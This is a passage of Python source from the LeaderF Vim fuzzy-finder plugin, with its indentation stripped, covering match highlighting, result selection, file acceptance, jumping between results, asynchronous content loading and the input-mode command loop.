lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _highlight(self, is_full_path, get_highlights, use_fuzzy_engine=False, clear=True, hl_group='Lf_hl_match'):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
if clear:
self._clearHighlights()
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
if use_fuzzy_engine:
self._highlight_pos = get_highlights(source=[getDigest(line)
for line in content[:highlight_number:unit]])
else:
# e.g., self._highlight_pos = [ [ [2,3], [6,2] ], [ [1,4], [7,6], ... ], ... ]
# where [2, 3] indicates the highlight starts at the 2nd column with the
# length of 3 in bytes
self._highlight_pos = [get_highlights(getDigest(line))
for line in content[:highlight_number:unit]]
if self._cli.isAndMode:
self._highlight_pos_list.append(self._highlight_pos)
bottom = len(content)
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 0 if is_full_path else 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")"""
% (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
def _highlightRefine(self, first_get_highlights, get_highlights):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
self._clearHighlights()
getDigest = self._getDigest
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
bottom = len(content)
self._highlight_pos = [first_get_highlights(getDigest(line, 1))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_match', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_match', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
self._highlight_refine_pos = [get_highlights(getDigest(line, 2))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_refine_pos):
start_pos = self._getDigestStartPos(content[unit*i], 2)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _regexFilter(self, iterable):
def noErrMatch(text, pattern):
try:
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text, pattern))
except TypeError: # python 2
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
except ValueError: # python 3
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
except:
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
try:
if ('-2' == lfEval("g:LfNoErrMsgMatch('', '%s')" % escQuote(self._cli.pattern))):
return iter([])
else:
return (line for line in iterable
if noErrMatch(escQuote(self._getDigest(line, 0)), escQuote(self._cli.pattern)))
except vim.error:
return iter([])
def _regexSearch(self, content, is_continue, step):
if not is_continue and not self._cli.isPrefix:
self._index = 0
self._result_content = self._filter(8000, self._regexFilter, content, is_continue)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def clearSelections(self):
for i in self._selections.values():
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % i)
self._selections.clear()
def _cleanup(self):
if not ("--recall" in self._arguments or lfEval("g:Lf_RememberLastSearch") == '1'):
self._pattern_bak = self._cli.pattern
self._cli.clear()
self._clearHighlights()
self._clearHighlightsPos()
self._help_length = 0
self._show_help = False
@modifiableController
def toggleHelp(self):
self._show_help = not self._show_help
if self._getInstance().isReverseOrder():
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._createHelpHint()
self.clearSelections()
self._resetHighlights()
def _accept(self, file, mode, *args, **kwargs):
if file:
if self._getExplorer().getStlCategory() != "Jumps":
lfCmd("norm! m'")
if self._getExplorer().getStlCategory() != "Help":
if mode == '':
pass
elif mode == 'h':
lfCmd("split")
elif mode == 'v':
lfCmd("bel vsplit")
kwargs["mode"] = mode
tabpage_count = len(vim.tabpages)
self._acceptSelection(file, *args, **kwargs)
for k, v in self._cursorline_dict.items():
if k.valid:
k.options["cursorline"] = v
self._cursorline_dict.clear()
self._issue_422_set_option()
if mode == 't' and len(vim.tabpages) > tabpage_count:
tab_pos = int(lfEval("g:Lf_TabpagePosition"))
if tab_pos == 0:
lfCmd("tabm 0")
elif tab_pos == 1:
lfCmd("tabm -1")
elif tab_pos == 3:
lfCmd("tabm")
def accept(self, mode=''):
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
lfCmd("norm! k")
return
else:
if self._getInstance().window.cursor[0] <= self._help_length:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! j')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("norm! j")
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
return
if self._getExplorer().getStlCategory() == "Rg":
if self._getInstance().currentLine == self._getExplorer().getContextSeparator():
return
if "--heading" in self._arguments and not re.match(r'^\d+[:-]', self._getInstance().currentLine):
return
self._cli.writeHistory(self._getExplorer().getStlCategory())
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
cwd = lfGetCwd()
if len(self._selections) > 0:
files = []
for i in sorted(self._selections.keys()):
files.append(self._getInstance().buffer[i-1])
if "--stayOpen" in self._arguments:
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if original buffer is an No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd(winnr())")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = lfGetCwd()
if mode == '' and self._getExplorer().getStlCategory() == "File":
self._accept(files[0], mode)
self._argaddFiles(files)
self._accept(files[0], mode)
lfCmd("doautocmd BufwinEnter")
else:
for file in files:
self._accept(file, mode)
if lfGetCwd() != orig_cwd:
dir_changed_by_autocmd = True
else:
dir_changed_by_autocmd = False
need_exit = True
else:
file = self._getInstance().currentLine
line_nr = self._getInstance().window.cursor[0]
need_exit = self._needExit(file, self._arguments)
if need_exit:
if "--stayOpen" in self._arguments:
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if original buffer is an No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd(winnr())")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = lfGetCwd()
self._accept(file, mode, self._getInstance().buffer, line_nr) # for bufTag
if lfGetCwd() != orig_cwd:
dir_changed_by_autocmd = True
else:
dir_changed_by_autocmd = False
if need_exit:
self._setAutochdir()
if dir_changed_by_autocmd == False:
self._restoreOrigCwd()
return None
else:
self._beforeExit()
self._content = vim.current.buffer[:]
return False
def _jumpNext(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] > len(instance.buffer) - self._help_length:
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
elif instance.window.cursor[0] == 1: # at the first line
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow > len(instance.buffer) - instance.helpLength:
instance.cursorRow = len(instance.buffer) - instance.helpLength
elif instance.cursorRow == 1: # at the last line
instance.cursorRow = len(instance.buffer) - instance.helpLength
else:
instance.cursorRow -= 1
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE"
% (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1,
len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length:
instance.window.cursor = (self._help_length + 1, 0)
elif instance.window.cursor[0] == len(instance.buffer): # at the last line
instance.window.cursor = (self._help_length + 1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow <= instance.helpLength:
instance.cursorRow = instance.helpLength + 1
elif instance.cursorRow == len(instance.buffer): # at the last line
instance.cursorRow = instance.helpLength + 1
else:
instance.cursorRow += 1
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
return True
def _jumpPrevious(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] >= len(instance.buffer) - self._help_length:
instance.window.cursor = (1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow >= len(instance.buffer) - instance.helpLength:
instance.cursorRow = 1
else:
instance.cursorRow += 1
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE"
% (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1,
len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length + 1:
instance.window.cursor = (len(instance.buffer), 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow <= instance.helpLength + 1:
instance.cursorRow = len(instance.buffer)
else:
instance.cursorRow -= 1
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
def quit(self):
self._getInstance().exitBuffer()
self._setAutochdir()
self._restoreOrigCwd()
def refresh(self, normal_mode=True):
self._getExplorer().cleanup()
content = self._getExplorer().getFreshContent()
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
if normal_mode: # when called in Normal mode
self._getInstance().buffer.options['modifiable'] = True
self._clearHighlights()
self._clearHighlightsPos()
self.clearSelections()
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._iteration_end = True
if self._cli.pattern:
self._index = 0
self._search(self._content)
if normal_mode: # when called in Normal mode
self._createHelpHint()
self._resetHighlights()
self._getInstance().buffer.options['modifiable'] = False
def addSelections(self):
nr = self._getInstance().window.number
if self._getInstance().getWinPos() != 'popup':
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
line_nr = self._getInstance().window.cursor[0]
if self._getInstance().isReverseOrder():
if line_nr > len(self._getInstance().buffer) - self._help_length:
lfCmd("norm! k")
return
else:
if line_nr <= self._help_length:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! j')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("norm! j")
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
return
if line_nr in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (self._selections[line_nr], self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % self._selections[line_nr])
del self._selections[line_nr]
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), line_nr))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % line_nr))
self._selections[line_nr] = id
def selectMulti(self):
orig_line = self._getInstance().window.cursor[0]
nr = self._getInstance().window.number
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
cur_line = int(lfEval("v:mouse_lnum"))
self.clearSelections()
for i in range(min(orig_line, cur_line), max(orig_line, cur_line)+1):
if i > self._help_length and i not in self._selections:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i)))
self._selections[i] = id
def selectAll(self):
line_num = len(self._getInstance().buffer)
if line_num > 300:
lfCmd("echohl Error | redraw | echo ' Too many files selected!' | echohl NONE")
lfCmd("sleep 1")
return
for i in range(line_num):
if i >= self._help_length and i+1 not in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), i+1))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i+1)))
self._selections[i+1] = id
def _gotoFirstLine(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("normal! gg")
def _readFinished(self):
pass
def startExplorer(self, win_pos, *args, **kwargs):
arguments_dict = kwargs.get("arguments", {})
if "--recall" in arguments_dict:
self._arguments["--recall"] = arguments_dict["--recall"]
elif "--previous" in arguments_dict:
self._arguments["--previous"] = arguments_dict["--previous"]
elif "--next" in arguments_dict:
self._arguments["--next"] = arguments_dict["--next"]
else:
self.setArguments(arguments_dict)
self._cli.setNameOnlyFeature(self._getExplorer().supportsNameOnly())
self._cli.setRefineFeature(self._supportsRefine())
self._orig_line = ''
if self._getExplorer().getStlCategory() in ["Gtags"]:
if "--update" in self._arguments or "--remove" in self._arguments:
self._getExplorer().getContent(*args, **kwargs)
return
if "--next" in arguments_dict:
if self._jumpNext() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
elif "--previous" in arguments_dict:
if self._jumpPrevious() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
self._cleanup()
# lfCmd("echohl WarningMsg | redraw | echo ' searching ...' | echohl NONE")
self._getInstance().setArguments(self._arguments)
empty_query = self._empty_query and self._getExplorer().getStlCategory() in ["File"]
remember_last_status = "--recall" in self._arguments \
or lfEval("g:Lf_RememberLastSearch") == '1' and self._cli.pattern
if remember_last_status:
content = self._content
self._getInstance().useLastReverseOrder()
win_pos = self._getInstance().getWinPos()
else:
content = self._getExplorer().getContent(*args, **kwargs)
self._getInstance().setCwd(lfGetCwd())
if self._getExplorer().getStlCategory() in ["Gtags"] and "--auto-jump" in self._arguments \
and isinstance(content, list) and len(content) == 1:
mode = self._arguments["--auto-jump"][0] if len(self._arguments["--auto-jump"]) else ""
self._accept(content[0], mode)
return
self._index = 0
pattern = kwargs.get("pattern", "") or arguments_dict.get("--input", [""])[0]
if len(pattern) > 1 and (pattern[0] == '"' and pattern[-1] == '"'
or pattern[0] == "'" and pattern[-1] == "'"):
pattern = pattern[1:-1]
self._cli.setPattern(pattern)
self._result_content = []
self._cb_content = []
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
# clear the buffer only when the content is not a list
self._getInstance().enterBuffer(win_pos, not isinstance(content, list))
self._initial_count = self._getInstance().getInitialWinHeight()
self._getInstance().setStlCategory(self._getExplorer().getStlCategory())
self._setStlMode(**kwargs)
self._getInstance().setStlCwd(self._getExplorer().getStlCurDir())
if kwargs.get('bang', 0):
self._current_mode = 'NORMAL'
else:
self._current_mode = 'INPUT'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
if not remember_last_status:
self._gotoFirstLine()
self._start_time = time.time()
self._bang_start_time = self._start_time
self._bang_count = 0
self._getInstance().buffer.vars['Lf_category'] = self._getExplorer().getStlCategory()
self._read_content_exception = None
if isinstance(content, list):
self._is_content_list = True
self._read_finished = 2
if not remember_last_status:
if len(content[0]) == len(content[0].rstrip("\r\n")):
self._content = content
else:
self._content = [line.rstrip("\r\n") for line in content]
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlResultsCount(len(self._content))
if not empty_query:
self._getInstance().setBuffer(self._content[:self._initial_count])
if lfEval("has('nvim')") == '1':
lfCmd("redrawstatus")
self._callback = self._workInIdle
if not kwargs.get('bang', 0):
self._readFinished()
self.input()
else:
if not remember_last_status and not empty_query:
self._getInstance().appendBuffer(self._content[self._initial_count:])
elif remember_last_status and len(self._getInstance().buffer) < len(self._result_content):
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
lfCmd("echo")
if self._cli.pattern:
self._cli._buildPrompt()
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
if not remember_last_status and not self._cli.pattern and empty_query:
self._gotoFirstLine()
self._guessSearch(self._content)
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
elif isinstance(content, AsyncExecutor.Result):
self._is_content_list = False
self._callback = self._workInIdle
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
if self._getExplorer().getStlCategory() in ["Rg", "Gtags"]:
if "--append" in self.getArguments():
self._offset_in_content = len(self._content)
if self._pattern_bak:
self._getInstance().setBuffer(self._content, need_copy=False)
self._createHelpHint()
else:
self._getInstance().clearBuffer()
self._content = []
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
self._stop_reader_thread = False
self._reader_thread = threading.Thread(target=self._readContent, args=(content,))
self._reader_thread.daemon = True
self._reader_thread.start()
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
else:
self._is_content_list = False
self._callback = partial(self._workInIdle, content)
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
def _readContent(self, content):
try:
for line in content:
self._content.append(line)
if self._stop_reader_thread:
break
else:
self._read_finished = 1
except Exception:
self._read_finished = 1
self._read_content_exception = sys.exc_info()
def _setResultContent(self):
if len(self._result_content) > len(self._getInstance().buffer):
self._getInstance().setBuffer(self._result_content)
elif self._index == 0:
self._getInstance().setBuffer(self._content, need_copy=True)
@catchException
def _workInIdle(self, content=None, bang=False):
if self._read_content_exception is not None:
if bang == True:
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
lfPrintError(self._read_content_exception[1])
return
else:
raise self._read_content_exception[1]
if bang == False and self._preview_open == False and lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1' \
and not self._getInstance().empty():
self._previewResult(False)
self._preview_open = True
if self._is_content_list:
if self._cli.pattern and (self._index < len(self._content) or len(self._cb_content) > 0):
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
return
if content:
i = -1
for i, line in enumerate(itertools.islice(content, 20)):
self._content.append(line)
if i == -1 and self._read_finished == 0:
self._read_finished = 1
if self._read_finished > 0:
if self._read_finished == 1:
self._read_finished += 1
self._getExplorer().setContent(self._content)
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlRunning(False)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
if bang:
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] != b'':
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
else:
self._getInstance().setBuffer(self._content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._content))
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < len(self._content) or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content, True, step)
if bang:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
cur_len = len(self._content)
if time.time() - self._start_time > 0.1:
self._start_time = time.time()
self._getInstance().setStlTotal(cur_len//self._getUnit())
self._getInstance().setStlRunning(True)
if self._cli.pattern:
self._getInstance().setStlResultsCount(len(self._result_content))
else:
self._getInstance().setStlResultsCount(cur_len)
if self._getInstance().getWinPos() not in ('popup', 'floatwin'):
lfCmd("redrawstatus")
if self._cli.pattern:
if self._index < cur_len or len(self._cb_content) > 0:
if self._fuzzy_engine:
step = 60000 * cpu_count
elif is_fuzzyMatch_C:
step = 10000
else:
step = 2000
self._search(self._content[:cur_len], True, step)
else:
if bang:
if self._getInstance().empty():
self._offset_in_content = len(self._content)
if self._offset_in_content > 0:
self._getInstance().appendBuffer(self._content[:self._offset_in_content])
else:
cur_len = len(self._content)
if cur_len > self._offset_in_content:
self._getInstance().appendBuffer(self._content[self._offset_in_content:cur_len])
self._offset_in_content = cur_len
if self._getInstance().getWinPos() not in ('popup', 'floatwin') \
and time.time() - self._bang_start_time > 0.5:
self._bang_start_time = time.time()
lfCmd("echohl WarningMsg | redraw | echo ' searching %s' | echohl NONE" % ('.' * self._bang_count))
self._bang_count = (self._bang_count + 1) % 9
elif len(self._getInstance().buffer) < min(cur_len, self._initial_count):
self._getInstance().setBuffer(self._content[:self._initial_count])
@modifiableController
def input(self):
self._preview_open = False
self._current_mode = 'INPUT'
self._getInstance().hideMimicCursor()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().getWinPos() == 'popup':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')"
% (self._getInstance().getPopupWinId(), 'leaderf#PopupFilter'))
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self.clearSelections()
self._hideHelp()
self._resetHighlights()
if self._cli.pattern: # --input xxx or from normal mode to input mode
if self._index == 0: # --input xxx
self._search(self._content)
elif self._empty_query and self._getExplorer().getStlCategory() in ["File"] \
and "--recall" not in self._arguments:
self._guessSearch(self._content)
for cmd in self._cli.input(self._callback):
cur_len = len(self._content)
cur_content = self._content[:cur_len]
if equal(cmd, '<Update>'):
if self._getInstance().getWinPos() == 'popup':
if self._getInstance()._window_object.cursor[0] > 1:
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
self._search(cur_content)
elif equal(cmd, '<Shorten>'):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Mode>'):
self._setStlMode()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._getInstance().setPopupStl(self._current_mode)
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
if self._cli.pattern:
self._search(cur_content)
elif equal(cmd, '<C-K>'):
self._toUp()
self._previewResult(False)
elif equal(cmd, '<C-J>'):
self._toDown()
self._previewResult(False)
elif equal(cmd, '<Up>'):
if self._cli.previousHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Down>'):
if self._cli.nextHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<LeftMouse>'):
if self._leftClick():
break
self._previewResult(False)
elif equal(cmd, '<2-LeftMouse>'):
self._leftClick()
if self.accept() is None:
break
elif equal(cmd, '<CR>'):
if self.accept() is None:
break
elif equal(cmd, '<C-X>'):
if self.accept('h') is None:
break
elif equal(cmd, '<C-]>'):
if self.accept('v') is None:
break
elif equal(cmd, '<C-T>'):
if self.accept('t') is None:
break
elif equal(cmd, '<C-\>'):
actions = ['', 'h', 'v', 't', 'dr']
action_count = len(actions)
